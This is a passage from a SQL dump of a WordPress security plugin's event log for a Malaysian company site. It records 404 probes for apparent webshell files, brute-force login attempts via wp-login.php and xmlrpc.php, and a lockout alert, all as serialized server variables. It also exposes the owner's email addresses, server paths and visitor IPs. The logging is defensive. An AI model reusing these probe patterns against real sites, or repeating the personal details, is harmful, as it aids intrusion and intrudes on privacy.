Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"124.156.248.48\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"124.156.248.48\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/jiuge.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/admin/jiuge.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG-W0q-QPicCh3WFsYmRAAAAIM\";s:12:\"REDIRECT_URL\";s:16:\"/admin/jiuge.asp\";s:11:\"REMOTE_ADDR\";s:13:\"120.35.102.15\";s:11:\"REMOTE_PORT\";s:5:\"63842\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/admin/jiuge.asp\";s:10:\"SCRIPT_URL\";s:16:\"/admin/jiuge.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG-W0q-QPicCh3WFsYmRAAAAIM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571929950.5051\";s:12:\"REQUEST_TIME\";s:10:\"1571929950\";}}','notice','2019-10-24 15:12:34','2019-10-24 15:12:30',35663208,37467272,'http://bintara.com.my//admin/jiuge.asp',1,0,'124.156.248.48'),(28961,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//style/kongya.AsPX\";s:14:\"CONTENT_LENGTH\";s:3:\"299\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"211.163.35.202\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"211.163.35.202\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/style/kongya.AsPX\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/style/kongya.AsPX\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XbG-akq-QPicCh3WFsYmSQAAAJU\";s:12:\"REDIRECT_URL\";s:18:\"/style/kongya.AsPX\";s:11:\"REMOTE_ADDR\";s:13:\"120.35.102.15\";s:11:\"REMOTE_PORT\";s:5:\"63984\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/style/kongya.AsPX\";s:10:\"SCRIPT_URL\";s:18:\"/style/kongya.AsPX\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XbG-akq-QPicCh3WFsYmSQAAAJU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571929963.0173\";s:12:\"REQUEST_TIME\";s:10:\"1571929963\";}}','notice','2019-10-24 15:12:44','2019-10-24 15:12:43',35265856,37072344,'http://bintara.com.my//style/kongya.AsPX',1,0,'211.163.35.202'),(25732,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYM9nkXpgmG5P@iB8kbyAAAAIE\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"178.62.71.94\";s:11:\"REMOTE_PORT\";s:5:\"43062\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYM9nkXpgmG5P@iB8kbyAAAAIE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066230.7367\";s:12:\"REQUEST_TIME\";s:10:\"1569066230\";}}','notice','2019-09-21 11:43:52','2019-09-21 11:43:51',17799280,19289616,'https://bintara.com.my/test/wp-login.php',1,0,'178.62.71.94'),(25730,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:43:27','2019-09-21 11:43:26',18090488,19290208,'https://bintara.com.my/2019/wp-login.php',1,0,'206.189.155.76'),(25731,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/2019/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/2019/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/2019/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYM4FiJ7D9Gn7wDPh8ZaQAAANM\";s:12:\"REDIRECT_URL\";s:16:\"/2019/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"206.189.155.76\";s:11:\"REMOTE_PORT\";s:5:\"40150\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/2019/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/2019/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYM4FiJ7D9Gn7wDPh8ZaQAAANM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066208.1724\";s:12:\"REQUEST_TIME\";s:10:\"1569066208\";}}','notice','2019-09-21 11:43:29','2019-09-21 11:43:28',18313960,19612288,'https://bintara.com.my/2019/xmlrpc.php',1,0,'206.189.155.76'),(25729,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:43:26\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:43:26\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:58:26\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:58:26\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:43:27','2019-09-21 11:43:26',17884136,19290208,'https://bintara.com.my/2019/wp-login.php',1,0,'206.189.155.76'),(27479,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"319\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"7EB4DC9E-6E66-40FC-9A3D-9BCADA000D43\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZasLs1AW5Yhg56lSglqOwAAAAA\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:10:\"1.32.27.67\";s:11:\"REMOTE_PORT\";s:5:\"56461\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZasLs1AW5Yhg56lSglqOwAAAAA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570155566.3065\";s:12:\"REQUEST_TIME\";s:10:\"1570155566\";}}','notice','2019-10-04 02:19:29','2019-10-04 02:19:26',35780040,37583376,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'1.32.27.67'),(27480,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:25:\"/blog/tag/logitech-rally/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:12:\"gzip,deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:42:\"ru, uk;q=0.8, be;q=0.8, en;q=0.7, *;q=0.01\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"support@search.yandex.ru\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:193:\"Mozilla/5.0 (iPhone; CPU iPhone OS 8_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B411 Safari/600.1.4 (compatible; YandexMobileBot/3.0; +http://yandex.com/bots)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:47:\"https://bintara.com.my/blog/tag/logitech-rally/\";s:19:\"REDIRECT_SCRIPT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZbHTQjr9uyDpFBVNuJ1uwAAAIs\";s:12:\"REDIRECT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:11:\"REMOTE_ADDR\";s:12:\"141.8.142.11\";s:11:\"REMOTE_PORT\";s:5:\"37339\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:47:\"https://bintara.com.my/blog/tag/logitech-rally/\";s:10:\"SCRIPT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZbHTQjr9uyDpFBVNuJ1uwAAAIs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570162509.9268\";s:12:\"REQUEST_TIME\";s:10:\"1570162509\";}}','notice','2019-10-04 04:15:13','2019-10-04 04:15:10',34366176,36168584,'https://bintara.com.my/blog/tag/logitech-rally/',1,0,'141.8.142.11'),(27481,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.12026; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"B475A69F-5164-4D9F-9B97-172123A394A6\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.12026\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZb2FGpMrYdOxlcM86D1vQAAAQo\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:10:\"1.32.27.67\";s:11:\"REMOTE_PORT\";s:5:\"54717\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZb2FGpMrYdOxlcM86D1vQAAAQo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570174484.4496\";s:12:\"REQUEST_TIME\";s:10:\"1570174484\";}}','notice','2019-10-04 07:34:49','2019-10-04 07:34:45',35780072,37583344,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'1.32.27.67'),(27482,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:59:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/AutoDiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"360\";s:12:\"CONTENT_TYPE\";s:8:\"text/xml\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"263-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-MY\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:35:\"microsoft.windowscommunicationsapps\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"263-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/AutoDiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/AutoDiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZcQr2pMrYdOxlcM86ADqAAAAAE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/AutoDiscover.xml\";s:11:\"REMOTE_ADDR\";s:10:\"1.32.27.67\";s:11:\"REMOTE_PORT\";s:5:\"52130\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/AutoDiscover.xm